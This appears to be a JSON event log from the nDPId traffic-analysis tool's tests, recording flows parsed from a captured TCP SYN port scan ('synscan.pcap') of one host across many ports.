+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs6z0AACoGMzWsEAAIQA2GNIzSFTjdUoMYAAAAAGACDAAXVwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAs56MAADUGK8+sEAAIQA2GNIzSH5XdUoMYAAAAAGACCAAQ+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ4kAAC8G8emsEAAIQA2GNIzSCEfdUoMYAAAAAGACEAAgSAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAskOgAADcGgIqsEAAIQA2GNIzTWZvdU4MZAAAAAGACEADO8AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUkAADcGnCmsEAAIQA2GNIzTAZbdU4MZAAAAAGACEAAm9gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdt4AADEGoJSsEAAIQA2GNIzTBvbdU4MZAAAAAGACCAAplgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsDDQAACoGEj+sEAAIQA2GNIzTBBrdU4MZAAAAAGACDAAocgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsdKAAADUGntKsEAAIQA2GNIzTgkrdU4MZAAAAAGACCACuQQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1154,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsUMkAACkGzqmsEAAIQA2GNIzTAP\/dU4MZAAAAAGACCAAvjQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs188AADYGOqOsEAAIQA2GNIzTIczdU4MZAAAAAGACDAAKwAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsywEAACkGVHGsEAAIQA2GNIzTA+DdU4MZAAAAAGACCAAsrAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1157,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs13sAADoGNvesEAAIQA2GNIzTDcfdU4MZAAAAAGACDAAexQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1158,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAstKwAADMGYMasEAAIQA2GNIzTI4LdU4MZAAAAAGACEAAFCgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1159,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs+qYAAC8GHsysEAAIQA2GNIzTINLdU4MZAAAAAGACEAAHugAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAs5fwAADcGK3asEAAIQA2GNIzTA\/LdU4MZAAAAAGACEAAkmgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060285,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1161,"flow_packet_id":1,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060285,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7YAADgGAL2sEAAIQA2GNIzTH5ndU4MZAAAAAGACBAAU8wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1162,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs2pkAADYGN9msEAAIQA2GNIzTDmrdU4MZAAAAAGACDAAeIgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsxEMAADMGUS+sEAAIQA2GNIzTA4bdU4MZAAAAAGACEAAlBgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAssU4AACUGciSsEAAIQA2GNIzSB7PdUoMYAAAAAGACCAAo3AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1165,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC18AACUGGBSsEAAIQA2GNIzSFGbdUoMYAAAAAGACCAAcKQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs4dwAAC4GOJasEAAIQA2GNIzSBEzdUoMYAAAAAGACDAAoQwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsC\/AAACUGF4OsEAAIQA2GNIzSGgzdUoMYAAAAAGACCAAWgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsuskAACwGYamsEAAIQA2GNIzSIZjdUoMYAAAAAGACBAAS9wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAsXBEAACwGwGGsEAAIQA2GNIzSE4jdUoMYAAAAAGACBAAhBwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060286,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_packet_id":1,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060286,"pkt":"ACYLMQczACWzv5HuCABFAAAs5JMAADoGKd+sEAAIQA2GNIzSAsrdUoMYAAAAAGACDAApxQAAAgQFtA=="} 